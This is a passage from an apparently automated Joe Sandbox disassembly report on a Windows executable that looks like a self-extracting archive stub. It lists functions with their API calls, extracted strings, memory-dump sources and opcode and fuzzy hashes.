_com_issue_error.COMSUPP ref: 0023FE48
_com_issue_error.COMSUPP ref: 0023FE52
GetLastError.KERNEL32(80070057,B0ABE22D,00000001,00000000,00000000,?,?,0022AF6C,ROOT\CIMV2), ref: 0023FE57
_com_issue_error.COMSUPP ref: 0023FE6A
GetLastError.KERNEL32(00000000,?,?,0022AF6C,ROOT\CIMV2), ref: 0023FE80
_com_issue_error.COMSUPP ref: 0023FE93

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 8f103fbc5bd9455a9a4b50d13140d559573e45d89cb5d643304416495fa3513b
Instruction ID: 3e3ef38f833866c3f9a11ff4ffc33b46920fd1bde4fae03329245bee32b15e2a
Opcode Fuzzy Hash: 8f103fbc5bd9455a9a4b50d13140d559573e45d89cb5d643304416495fa3513b
Instruction Fuzzy Hash: DD41F9B1E10319ABCB10DF64ED45BAFBBA8EF48751F10423AF905D7291D7349910CBA4

Function 00229382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00229387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 002293AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 002293C9

Part of subcall function 0022C29A: _wcslen.LIBCMT ref: 0022C2A2

Part of subcall function 00231FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0022C116,00000000,.exe,?,?,00000800,?,?,?,00238E3C), ref: 00231FD1

_swprintf.LIBCMT ref: 00229465

Part of subcall function 00224092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002240A5

MoveFileW.KERNEL32(?,?), ref: 002294D4
MoveFileW.KERNEL32(?,?), ref: 00229514

Strings

rtmp%d, xrefs: 0022944E

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: d9f837143b42fb362e3db1cdfd153ebd936fe3ed4a92bcb7ebbffcbe6cc43a6d
Instruction ID: 45ef5395f2df6d2e8c46afb3c204f36b6ccfe8e7546c6929cfc83d9859287273
Opcode Fuzzy Hash: d9f837143b42fb362e3db1cdfd153ebd936fe3ed4a92bcb7ebbffcbe6cc43a6d
Instruction Fuzzy Hash: AE4161B1920275B6CF21EFE0AC45EDE737CAF45340F4048A5B609A3051DA388BE98F60

Function 00221100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0022112B
_wcslen.LIBCMT ref: 00221153
_wcslen.LIBCMT ref: 00221182
_wcslen.LIBCMT ref: 002211A9

Strings

U#, xrefs: 0022120D, 0022123B
p#, xrefs: 00221205, 00221233
z#, xrefs: 00221219

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _wcslen
String ID: U#$p#$z#
API String ID: 176396367-1082750217
Opcode ID: 8e8c715c523ceea48c3355d8b023333d30e56be43953860cced83661a8af9222
Instruction ID: 5f8491a1cec059ee3ff5232db99396553ab911e338cdede878701a5e7f019863
Opcode Fuzzy Hash: 8e8c715c523ceea48c3355d8b023333d30e56be43953860cced83661a8af9222
Instruction Fuzzy Hash: C541C671A116669BCB15DFA8DC4A9EF7BBCEF00310F004119FD45F7245DA30AE648BA0

Function 00239ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00239EEE
GetWindowRect.USER32(?,00000000), ref: 00239F44
ShowWindow.USER32(?,00000005,00000000), ref: 00239FDB
SetWindowTextW.USER32(?,00000000), ref: 00239FE3
ShowWindow.USER32(00000000,00000005), ref: 00239FF9

Strings

#, xrefs: 00239F52, 00239F87
RarHtmlClassName, xrefs: 00239FA5

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: Window$Show$RectText
String ID: #$RarHtmlClassName
API String ID: 3937224194-857309098
Opcode ID: 7748474afe799c7000e17055027658359e73a791da63c2528639e7dd5b90b529
Instruction ID: 67ca783032d7e0b31f64c3c02e0199c055d6fa598aed0345517ace3359dc5e41
Opcode Fuzzy Hash: 7748474afe799c7000e17055027658359e73a791da63c2528639e7dd5b90b529
Instruction Fuzzy Hash: DA41F176015300EFCB219F64EC8DB6BBBA8FF48B01F004529F849AA152DB74D964CF61

Function 00231218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0023122E

Part of subcall function 0022B146: GetVersionExW.KERNEL32(?), ref: 0022B16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00231251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00231263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00231274
SystemTimeToFileTime.KERNEL32(?,?), ref: 00231284
SystemTimeToFileTime.KERNEL32(?,?), ref: 00231294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 002312CF
__aullrem.LIBCMT ref: 00231379

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 2a9da1c53c1b4e2fbe053c276f693c377412f1113555d39f09875e1cd4ac9946
Instruction ID: 3c5d0cf3dd233ad177991172e91bc2e53e07ed83160ead6caf16fd37203db002
Opcode Fuzzy Hash: 2a9da1c53c1b4e2fbe053c276f693c377412f1113555d39f09875e1cd4ac9946
Instruction Fuzzy Hash: F14118B1508305AFC710DF65D88496BBBF9FF88355F00892EF99AD2210E734E669CB51

Function 00222210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00222536

Part of subcall function 00224092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002240A5

Part of subcall function 002305DA: _wcslen.LIBCMT ref: 002305E0

Strings

xc%u, xrefs: 0022275A
x%u, xrefs: 002226FD
;%u, xrefs: 00222523

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: e0b803617172f2ef120a26d3a3140d8cf6dacbd42fb6623b7fe21bd8102eab05
Instruction ID: c378d548700285c895883201c99653a0d23c1f871a5fffcc947fb10cc43a4ea1
Opcode Fuzzy Hash: e0b803617172f2ef120a26d3a3140d8cf6dacbd42fb6623b7fe21bd8102eab05
Instruction Fuzzy Hash: 2BF15B70624361FBCB24DFA4A4957FE77996F90300F08056EFC859B243CB65896DCB62

Function 00239CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00239D0A

Strings

</style>, xrefs: 00239E52
</p>, xrefs: 00239DE8
<br>, xrefs: 00239DFE
<style>, xrefs: 00239E30
>, xrefs: 00239D4B

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: 6570366215ebeb6a43fd655840056ac4ad4955c82ec4d57f40f5f4dbc989a989
Instruction ID: d51d5f942e05a6d29c6849bda922cc94eca5cf98d1e90b0a9ce20ce5cf35bd69
Opcode Fuzzy Hash: 6570366215ebeb6a43fd655840056ac4ad4955c82ec4d57f40f5f4dbc989a989
Instruction Fuzzy Hash: 6851E4E667432795DB30BE25981277673E4DFA3750F68041BE9C18B1C0FBE58CE18261

Function 0024F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0024FE02,00000000,00000000,00000000,00000000,00000000,0024529F), ref: 0024F6CF
__fassign.LIBCMT ref: 0024F74A
__fassign.LIBCMT ref: 0024F765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0024F78B
WriteFile.KERNEL32(?,00000000,00000000,0024FE02,00000000,?,?,?,?,?,?,?,?,?,0024FE02,00000000), ref: 0024F7AA
WriteFile.KERNEL32(?,00000000,00000001,0024FE02,00000000,?,?,?,?,?,?,?,?,?,0024FE02,00000000), ref: 0024F7E3

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: e20a5ca9b4f9c5f3da0cc66e553d58024a2c76b2eea56a2c8832377dbac2900d
Instruction ID: 34bd36275353dd0d0b74187459d34d9a021dbb29520de4dece9641609f54ea1d
Opcode Fuzzy Hash: e20a5ca9b4f9c5f3da0cc66e553d58024a2c76b2eea56a2c8832377dbac2900d
Instruction Fuzzy Hash: 825108B1D102099FCB14CFA8DD45AEEFBF8EF48310F15416AE951EB291D730AA50CBA0

Function 0023CE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 0023CE9D

Part of subcall function 0022B690: _wcslen.LIBCMT ref: 0022B696

_swprintf.LIBCMT ref: 0023CED1

Part of subcall function 00224092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002240A5

SetDlgItemTextW.USER32(?,00000066,0026946A), ref: 0023CEF1
_wcschr.LIBVCRUNTIME ref: 0023CF22
EndDialog.USER32(?,00000001), ref: 0023CFFE

Strings

%s%s%u, xrefs: 0023CEC6

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
String ID: %s%s%u
API String ID: 689974011-1360425832
Opcode ID: 282c14a42fb65a6e4b2b1d4223340176388e9a29470a5021b5ec89f4f7fa6497
Instruction ID: 7a1f61c7de71fa98b6702db58798b92709410ebcc7bfdce675ca6fa84252a8a8
Opcode Fuzzy Hash: 282c14a42fb65a6e4b2b1d4223340176388e9a29470a5021b5ec89f4f7fa6497
Instruction Fuzzy Hash: BD4182F1820219AADF25DF90DC45EEA77BCEB05740F5080A7F909E7041EEB09A948F61

Function 00242900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00242937
___except_validate_context_record.LIBVCRUNTIME ref: 0024293F
_ValidateLocalCookies.LIBCMT ref: 002429C8
__IsNonwritableInCurrentImage.LIBCMT ref: 002429F3
_ValidateLocalCookies.LIBCMT ref: 00242A48

Strings

csm, xrefs: 002429DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 51398870cab17f713e5d594392922faa84456f38e4e4bb43d7e85774baed3c2c
Instruction ID: 25a14176b224206234b1c9de6a197fe7db0f309c644048169f83b1dcd4c1c47f
Opcode Fuzzy Hash: 51398870cab17f713e5d594392922faa84456f38e4e4bb43d7e85774baed3c2c
Instruction Fuzzy Hash: B241D730A20219EFCF18DF29C885A9EBBB1EF45314F548055FC15AB392D7719A69CF90

Function 00239955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0023995E
_wcslen.LIBCMT ref: 00239993

Strings

, xrefs: 002399B0
 , xrefs: 00239A21
<br>, xrefs: 002399DF
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00239987

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: fd70d7663afb6e3675cca1df688b9ce7f45db55e99794f8bd12e2e4fc0ced69f
Instruction ID: b08a2d809abba5aa8de8dfa81ecd61f4f393bc637598b02806e787323f2d965c
Opcode Fuzzy Hash: fd70d7663afb6e3675cca1df688b9ce7f45db55e99794f8bd12e2e4fc0ced69f
Instruction Fuzzy Hash: F13149B276434756DA34AF549C42B7AB3E4EB92720F50451EF88247280FBE0ADF483A5

Function 0023AAC9 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0023AAD2
GetObjectW.GDI32(?,00000018,?), ref: 0023AB01
ReleaseDC.USER32(00000000,?), ref: 0023AB99

Strings

-#, xrefs: 0023AB32, 0023AB3F, 0023AB73, 0023AB7F
#, xrefs: 0023AB25
7#, xrefs: 0023AB67

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: ObjectRelease
String ID: -#$7#$#
API String ID: 1429681911-2891604730
Opcode ID: 50750840e448903e36c2d382e0483c7f8809b2634517fc6df98edeb07d077524
Instruction ID: ffeaec47a90995179fb6b9b36d3ab5a0d8dabd477d6db9bd0f18e10f23f5e61e
Opcode Fuzzy Hash: 50750840e448903e36c2d382e0483c7f8809b2634517fc6df98edeb07d077524
Instruction Fuzzy Hash: 4C212A76109314EFD3019FA5EC4CE6FBFE9FB89B51F040829FA4592121D7319A548B62

Function 0024C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0024C868: _free.LIBCMT ref: 0024C891

_free.LIBCMT ref: 0024C8F2

Part of subcall function 00248DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0024C896,?,00000000,?,00000000,?,0024C8BD,?,00000007,?,?,0024CCBA,?), ref: 00248DE2
Part of subcall function 00248DCC: GetLastError.KERNEL32(?,?,0024C896,?,00000000,?,00000000,?,0024C8BD,?,00000007,?,?,0024CCBA,?,?), ref: 00248DF4

_free.LIBCMT ref: 0024C8FD
_free.LIBCMT ref: 0024C908
_free.LIBCMT ref: 0024C95C
_free.LIBCMT ref: 0024C967
_free.LIBCMT ref: 0024C972
_free.LIBCMT ref: 0024C97D

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: e0f99b38db2b89f0720472783f6802ac2a6cf8eb0f332f01e7e377199a7f2e05
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: 7E114F71AA2B08EAE565BBB5CC07FCB7BAC9F00F00F500C15B39D66092DA65B5258F50

Function 0023E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0023E669,0023E5CC,0023E86D), ref: 0023E605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0023E61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0023E630

Strings

KERNEL32.DLL, xrefs: 0023E600
ReleaseSRWLockExclusive, xrefs: 0023E625
AcquireSRWLockExclusive, xrefs: 0023E615

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: def7e960a8c546c1117e89ea6ea8f795050e891e8b15213f871424cc96e761b8
Instruction ID: c16093879eb0de54bd955202def30fc9fd24dc0c0a5122123ca95820c6a766e3
Opcode Fuzzy Hash: def7e960a8c546c1117e89ea6ea8f795050e891e8b15213f871424cc96e761b8
Instruction Fuzzy Hash: 29F0C2F57B17235B0F218E656C9A56662CC6A25792B02043AEA01D31D0EB60CC7E5F95

Function 00248900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0024891E

Part of subcall function 00248DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0024C896,?,00000000,?,00000000,?,0024C8BD,?,00000007,?,?,0024CCBA,?), ref: 00248DE2
Part of subcall function 00248DCC: GetLastError.KERNEL32(?,?,0024C896,?,00000000,?,00000000,?,0024C8BD,?,00000007,?,?,0024CCBA,?,?), ref: 00248DF4

_free.LIBCMT ref: 00248930
_free.LIBCMT ref: 00248943
_free.LIBCMT ref: 00248954
_free.LIBCMT ref: 00248965

Strings

p%, xrefs: 00248914

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: p%
API String ID: 776569668-1703017251
Opcode ID: a0ccf5dda9204e66a166db7e5d0f1ff56e9d2b4c379f4f579d03001fc4b08d3e
Instruction ID: 004604d8d6e40380d346d302d113d245263eee292c37dd7322e64cb3cf24423f
Opcode Fuzzy Hash: a0ccf5dda9204e66a166db7e5d0f1ff56e9d2b4c379f4f579d03001fc4b08d3e
Instruction Fuzzy Hash: 7AF0DA79C33622DB8B4E6F24FC0A41D3BA5FB247253010506FA14973B5DB325A699F85

Function 0023146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 002314C2

Part of subcall function 0022B146: GetVersionExW.KERNEL32(?), ref: 0022B16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002314E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 00231500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00231513
SystemTimeToFileTime.KERNEL32(?,?), ref: 00231523
SystemTimeToFileTime.KERNEL32(?,?), ref: 00231533

